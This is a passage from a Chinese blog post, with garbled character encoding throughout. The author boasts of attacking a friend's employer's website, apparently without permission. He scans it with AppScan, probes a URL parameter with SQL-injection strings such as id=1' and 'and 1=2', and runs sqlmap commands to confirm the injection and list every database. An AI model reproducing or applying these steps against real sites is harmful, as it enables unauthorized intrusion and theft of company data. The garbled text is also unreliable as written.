最近在研究Web安全相關(guān)的知識(shí)，特別是SQL注入類(lèi)的相關(guān)知識(shí)。接觸了一些與SQL注入相關(guān)的工具。周末在家閑著無(wú)聊，想把平時(shí)學(xué)的東東結(jié)合起來(lái)攻擊一下身邊某個(gè)小伙伴去的公司，看看能不能得逞。不試不知道，一試還真TM得逞了，內(nèi)心有些小激動(dòng)，特在此寫(xiě)博文一篇，來(lái)記錄下我是如何一步步攻破這家互聯(lián)網(wǎng)公司的。
　　【作案工具介紹】
　?。?） AppScan滲透掃描工具
　　Appscan是Web應(yīng)用程序滲透測(cè)試舞臺(tái)上使用最廣泛的工具之一。它是一個(gè)桌面應(yīng)用程序，它有助于專(zhuān)業(yè)安全人員進(jìn)行Web應(yīng)用程序自動(dòng)化脆弱性評(píng)估。
　　（2） Sqlmap滲透測(cè)試工具
　　Sqlmap是一個(gè)自動(dòng)化的SQL注入工具，其主要功能是掃描，發(fā)現(xiàn)并利用給定的URL的SQL注入漏洞。
　　【作案細(xì)節(jié)如下】
　　首先使用Appscan工具，對(duì)www.xxx.com互聯(lián)網(wǎng)公司的官網(wǎng)進(jìn)行掃描，掃描結(jié)果如下：
　　
　　在這56個(gè)安全性問(wèn)題中，找到你感興趣的鏈接，例如下面這條：
　　http://www.xxx.com/system/cms/show？id=1
　　為何要挑出這一條呢？因?yàn)樗鼘?duì)于SQL注入比較典型，下面普及下SQL注入常用手法。首先用如下語(yǔ)句，確定該網(wǎng)站是否存在注入點(diǎn)：
　　http://192.168.16.128/news.php？id=1原網(wǎng)站
　　http://192.168.16.128/news.php？id=1’ 出錯(cuò)或顯示不正常
　　http://192.168.16.128/news.php？id=1and 1=1 出錯(cuò)或顯示不正常
　　http://192.168.16.128/news.php？id=1and 1=2 出錯(cuò)或顯示不正常
　　如果有出錯(cuò)，說(shuō)明存在注入點(diǎn)。
　　在判斷完http://www.xxx.com/system/cms/show？id=1該鏈接存在注入點(diǎn)后，接下來(lái)就啟動(dòng)我們的滲透測(cè)試工具Sqlmap，進(jìn)行下一步的注入工作，詳細(xì)過(guò)程如下：
　　1） 再次確認(rèn)目標(biāo)注入點(diǎn)是否可用：
　　python sqlmap.py -u http://www.xxx.com/system/cms/show？id=1
　　參數(shù)：
　　-u：指定注入點(diǎn)url
　　結(jié)果：
　　
　　注入結(jié)果展示：
　　a. 參數(shù)id存在基于布爾的盲注，即可以根據(jù)返回頁(yè)面判斷條件真假的注入。
　　b. 參數(shù)id存在基于時(shí)間的盲注，即不能根據(jù)頁(yè)面返回內(nèi)容判斷任何信息，用條件語(yǔ)句查看時(shí)間延遲語(yǔ)句是否執(zhí)行（即頁(yè)面返回時(shí)間是否增加）來(lái)判斷。
　　c. 數(shù)據(jù)庫(kù)類(lèi)型為：MySql 5.0.12
　　2） 暴庫(kù)所有數(shù)據(jù)庫(kù)：
　　一條命令即可曝出該sqlserver中所有數(shù)據(jù)庫(kù)名稱(chēng)，命令如下：
　　python sqlmap.py -u http://www.xxx.com/system/cms/show？id=1–dbs
　　參數(shù)：
　　–dbs：dbs前面有兩條杠，列出所有數(shù)據(jù)庫(kù)。